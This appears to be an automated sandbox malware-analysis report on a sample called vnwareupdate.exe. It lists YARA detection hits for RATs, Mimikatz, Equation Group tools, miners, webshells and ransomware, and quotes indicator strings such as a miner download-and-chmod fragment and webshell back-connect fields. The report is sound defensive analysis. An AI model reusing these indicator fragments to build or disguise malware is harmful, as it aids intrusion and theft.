Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup__jparsescan_parsescan_5	Equation Group hack tool leaked by ShadowBrokers- from files jparsescan, parsescan	Florian Roth	0xdb489f:$s1: # default is to dump out all scanned hosts found 0xdb4931:$s3: sadmind is available on two ports, this also works)
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup__ftshell	Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7	Florian Roth	0xdb53a9:$s1: if { [string length $uRemoteUploadCommand] 0xdb53f1:$s2: processUpload 0xdb541c:$s3: global dothisreallyquiet
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_Toolset_Apr17_Eternalromance	Detects EquationGroup Tool - April Leak	Florian Roth	0xd9312e:$x1: [-] Error: Exploit choice not supported for target OS!! 0xd93183:$x2: Error: Target machine out of NPP memory (VERY BAD!!) - Backdoor removed 0xd931e8:$x3: [-] Error: Backdoor not present on target 0xd9322f:$x4: ********* TARGET ARCHITECTURE IS X64 **********
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_Toolset_Apr17_Gen2	Detects EquationGroup Tool - April Leak	Florian Roth	0xd93bac:$s1: [+] Setting password : (NULL) 0xd93be7:$s2: [-] TbBuffCpy() failed! 0xd93c1c:$s3: [+] SMB negotiation 0xd93c4d:$s4: 12345678-1234-ABCD-EF00-0123456789AB 0xd93c8f:$s5: Value must end with 0000 (2 NULLs) 0xd93ccf:$s6: [] Configuring Payload 0xd93d04:$s7: [] Connecting to listener
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0	Detects EquationGroup Tool - April Leak	Florian Roth	0xda1a20:$x1: DFReader.exe logfile AESKey [-j] [-o outputfilename] 0xda1a72:$x2: Double Feature Target Version 0xda1aad:$x3: DoubleFeature Process ID
Process Memory Space: vnwareupdate.exe PID: 2540	EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4	Detects EquationGroup Tool - April Leak	Florian Roth	0xda2425:$x1: * Listening Post DLL %s() returned error code %d. 0xda2474:$s1: WsaErrorTooManyProcesses 0xd9278d:$s2: NtErrorMoreProcessingRequired 0xda24aa:$s2: NtErrorMoreProcessingRequired 0xd8ec4d:$s3: Connection closed by remote host (TCP Ack/Fin) 0xda24e5:$s3: Connection closed by remote host (TCP Ack/Fin) 0xda2531:$s4: ServerErrorBadNamePassword
Process Memory Space: vnwareupdate.exe PID: 2540	APT6_Malware_Sample_Gen	Rule written for 2 malware samples that communicated to APT6 C2 servers	Florian Roth	0xe04e88:$x2: SPCK!it is a [(?riddle?) wrapped in a {mystery}] inside an <enigma>! 0xe04eea:$x3: 636C7369643A46334430443336462D323346382D343638322D413139352D373443393242303344344146 0xe04f5c:$s1: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 0xe04fc0:$s2: DUMPTHIN 0xe0501d:$s4: window.eval(f.decodeURIComponent(a)); 0xe05060:$s5: /tbedrs.dll 0xe05089:$s6: NSISDL/1.2 (Mozilla) 0xe050bb:$s7: NSIS_Inetc (Mozilla) 0xe050ed:$s8: /logos.gif 0xe05115:$s9: synflood 0xe05186:$s11: udpflood 0xd3f5d2:$s12: shellcode 0xd3f9e9:$s12: shellcode 0xd3fb8f:$s12: shellcode 0xd5429d:$s12: shellcode 0xd6ea4a:$s12: shellcode 0xd6ea91:$s12: shellcode 0xd757b4:$s12: shellcode 0xd7f3b5:$s12: shellcode 0xd7f3fe:$s12: shellcode 0xd7f412:$s12: shellcode
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_CryptoMiner	Yara detected Crypto Miner	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_ComRAT_XORKey	Yara detected Turla ComRAT XORKey	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Nukesped	Yara detected Nukesped	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_xtremerat_1	Yara detected Xtreme RAT	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_PupyRAT	Yara detected PupyRAT	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
Process Memory Space: vnwareupdate.exe PID: 2540	dragos_crashoverride_moduleStrings	IEC-104 Interaction Module Program Strings	Dragos Inc	0xd87b19:$s1: IEC-104 client: ip=%s; port=%s; ASDU=%u 0xd87af1:$s5: iec104.log
Process Memory Space: vnwareupdate.exe PID: 2540	fe_cpe_ms17_010_ransomware	probable petya ransomware using eternalblue, wmic, psexec	ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick	0xd4b666:$dmap04: termsrv 0xe290ff:$dmap04: termsrv 0xe403b2:$dmap04: termsrv 0xe40428:$dmap04: termsrv 0xd53d91:$dmap05: \ADMIN$ 0xd7cd0b:$dmap05: \admin$ 0xe02abd:$dmap05: \admin$ 0xe66aa4:$dmap05: \ADMIN$ 0x561221:$dmap06: GetLogicalDrives 0x56123e:$dmap06: GetLogicalDrives 0xbcd0df:$dmap06: GetLogicalDriveS 0x56318e:$dmap07: GetDriveTypeW 0x5631a8:$dmap07: GetDriveTypeW 0xd81352:$msg05: your important files are encrypted 0xd8146f:$msg10: Bitcoin wallet ID 0x556280:$msg_pcre: encryption 0x5562c1:$msg_pcre: encryption 0x5c4eff:$msg_pcre: decryption 0xa0d759:$msg_pcre: decryption 0xa0d785:$msg_pcre: encryption 0xbcb24f:$msg_pcre: decryption
Process Memory Space: vnwareupdate.exe PID: 2540	Anthem_DeepPanda_htran_exe	Anthem Hack Deep Panda - htran-exe	Florian Roth	0xe1a323:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0xe42247:$s0: %s -<listen\|tran\|slave> <option> [-log logfile] 0xe1a2e7:$s1: [-] Gethostbyname(%s) error:%s 0xe1a410:$s3: [SERVER]connection to %s:%d error 0xe43d6e:$s3: [SERVER]connection to %s:%d error 0xe4fb22:$s3: [SERVER]connection to %s:%d error 0xe6981b:$s3: [SERVER]connection to %s:%d error 0xe6985a:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort> 0xe1a3ce:$s5: [-] ERROR: Must supply logfile name. 0xe43e36:$s6: [-] There is a error...Create a new connection. 0xe6990f:$s6: [-] There is a error...Create a new connection. 0xe1a4d6:$s7: [+] Accept a Client on port %d from %s 0xe6995c:$s7: [+] Accept a Client on port %d from %s 0xe69acd:$s7: [+] Accept a Client on port %d from %s 0xe699a1:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort> 0xe1a51a:$s12: [+] Make a Connection to %s:%d ...... 0xe1a5d1:$s15: [+] OK! I Closed The Two Socket. 0xe4fb61:$s15: [+] OK! I Closed The Two Socket. 0xe1a48f:$s16: [+] Waiting another Client on port:%d.... 0xe69a85:$s16: [+] Waiting another Client on port:%d.... 0xe69acd:$s17: [+] Accept a Client on port %d from %s ......
Process Memory Space: vnwareupdate.exe PID: 2540	Backdoor_WebShell_asp	Detect ASPXSpy	xylitol@temari.fr	0xe57069:$string1: CmdShell 0xe5bb88:$string1: CmdShell 0xe6f487:$string1: CmdShell 0xe6f4f1:$string1: CmdShell 0xe6f697:$string1: CmdShell 0xe6f757:$string1: CmdShell 0xe6f7ad:$string1: CmdShell 0xe1d7ea:$string4: PortScan 0xe1aef5:$plugin: Test.AspxSpyPlugins
Process Memory Space: vnwareupdate.exe PID: 2540	multiple_webshells_0015	Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0xe0f22c:$s1: $_POST['backconnectip']
Process Memory Space: vnwareupdate.exe PID: 2540	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0xd1806f:$v2: mozsqlite3 0xd52309:$ping: ping 192.0.2.2 0xd5234a:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
Click to see the 1322 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: GZe6EcSTpO.exe

Avira: detected

Multi AV Scanner detection for submitted file

Show sources

Source: GZe6EcSTpO.exe	Virustotal: Detection: 52%			Perma Link
Source: GZe6EcSTpO.exe	ReversingLabs: Detection: 41%

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02CA0AA0 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,	3_2_02CA0AA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02CA0380 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,	3_2_02CA0380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 3_2_02CA0E90 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	3_2_02CA0E90
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02DB0AA0 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,	5_2_02DB0AA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02DB0380 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,	5_2_02DB0380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 5_2_02DB0E90 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	5_2_02DB0E90
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02E10AA0 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,	8_2_02E10AA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02E10380 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,	8_2_02E10380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 8_2_02E10E90 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	8_2_02E10E90
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C102A0 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,	9_2_02C102A0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C10380 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,	9_2_02C10380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C10310 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,	9_2_02C10310
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C10120 CryptDestroyKey,CryptReleaseContext,CertFreeCertificateContext,	9_2_02C10120
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C12460 CryptAcquireContextW,CryptReleaseContext,	9_2_02C12460
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C10AA0 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,	9_2_02C10AA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C10E90 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	9_2_02C10E90
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C11070 CryptExportKey,CryptExportKey,GetLastError,CryptExportKey,GetLastError,	9_2_02C11070
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C2B740 CryptAcquireContextW,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,CryptGenRandom,CryptReleaseContext,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,GlobalMemoryStatus,GetCurrentProcessId,	9_2_02C2B740
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C115A0 CryptCreateHash,GetLastError,CryptSetHashParam,GetLastError,CryptSignHashW,GetLastError,CryptDestroyHash,	9_2_02C115A0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C11AC0 CryptCreateHash,GetLastError,CryptSetHashParam,GetLastError,CryptSignHashW,CryptDestroyHash,	9_2_02C11AC0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C11880 CryptDecrypt,GetLastError,memcpy,	9_2_02C11880
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 9_2_02C0FE60 CryptEnumProvidersW,CryptEnumProvidersW,GetLastError,CryptEnumProvidersW,GetLastError,	9_2_02C0FE60
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02C00AA0 CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptReleaseContext,	10_2_02C00AA0
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02C00380 MultiByteToWideChar,MultiByteToWideChar,GetLastError,CryptAcquireContextW,CryptGetProvParam,GetLastError,CryptReleaseContext,CryptGetProvParam,GetLastError,CryptReleaseContext,	10_2_02C00380
Source: C:\Users\user\Desktop\vnwareupdate.exe	Code function: 10_2_02C00E90 MultiByteToWideChar,MultiByteToWideChar,CryptAcquireContextW,CryptReleaseContext,GetLastError,	10_2_02C00E90

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Privilege Escalation:

Detected Hacktool Mimikatz

Show sources

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp

String found in binary or memory: $s1 = "http://blog.gentilkiwi.com/mimikatz" ascii

Bitcoin Miner:

Yara detected Coinhive miner

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Crypto Miner

Show sources

Source: Yara match	File source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: 0000000A.00000003.304068846.0000000005000000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.415404464.0000000005130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.305422889.0000000005007000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY
Source: Yara match	File source: C:\Users\user\Desktop\otx-c2-iocs.txt, type: DROPPED

Found strings related to Crypto-Mining

Show sources

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $s1 = "stratum+tcp://" ascii
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $s7 = "-P /tmp && chmod +x /tmp/pools.txt" fullword ascii
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $s8 = "\"algo\": \"cryptonight\", // cryptonight (default) or cryptonight-lite" fullword ascii
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: $s1 = "stratum+tcp://" ascii
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: reference = "https://coinhive.com/documentation/miner"
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: Smominru Monero mining botnet making millions for operators https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-koOilRig uses RGDoor IIS Backdoor on Targets in the Middle East https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iiOilRig uses RGDoor IIS Backdoor on Targets in the Middle East https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iicLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-crLarge Scale Monero Cryptocurrency Mining Operation using XMRig https://researchcenter.paloaltonetworks.com/2018/01/unit42-large-scale-monero-cr

Source: GZe6EcSTpO.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\vnwareupdate.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll

Jump to behavior

Source: GZe6EcSTpO.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: $x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Debug\\exeruner.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\T+M\\Result\\DocPrint.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "\\RbDoorX64.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\UACElevator_RID2B2C.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\shellcodegenerator.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "\\Gubed\\Release\\Gubed.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\pstgdump_RID2A85.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x3 = "\\Release\\FakeRun.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "c:\\ntevt.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\BypassUAC.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\archer_lyl\\Release\\Archer_Input.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\ASGT.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = /\\Debug\\[a-z]{0,8}katz.pdb/ source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "ntfltmgr.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x4 = "\\Debug\\dloader.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\ScreenMonitorService\\Release\\smmsrv.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Debug\\AllTheThings_RID2BB8.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x5 = "mfc42l00.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\injector.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\ChromePasswordDump\\Release\\FireMaster.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\svc.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "Desktop\\Htran\\Release\\Htran.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "C:\\Documents and Settings\\Administrator\\Desktop\\GetPAI\\Out\\IE.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\EWSTEW.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\beacon\\Release\\beacon.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "\\Release\\dloader.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Release\\RoyalCli.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\Release\\InjectDll.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\obj\\Debug\\Sharpire_RID2A4F.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\milk\\Release\\milk.pdb" ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x1 = "\\NoPowerShell.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x6 = "\\x86\\Release\\word.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "D:\\gitpoc\\UAC\\src\\x64\\Release\\lpe.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s3 = "\\Release\\Loader.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: $x2 = "D:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode _2\\Release\\ServiceClient.pdb" fullword ascii source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp
Source:	Binary string: BlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy attacking mining and railway companies in Ukraine http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-cPrivileges and Credentials: Phished at the Request of Counsel 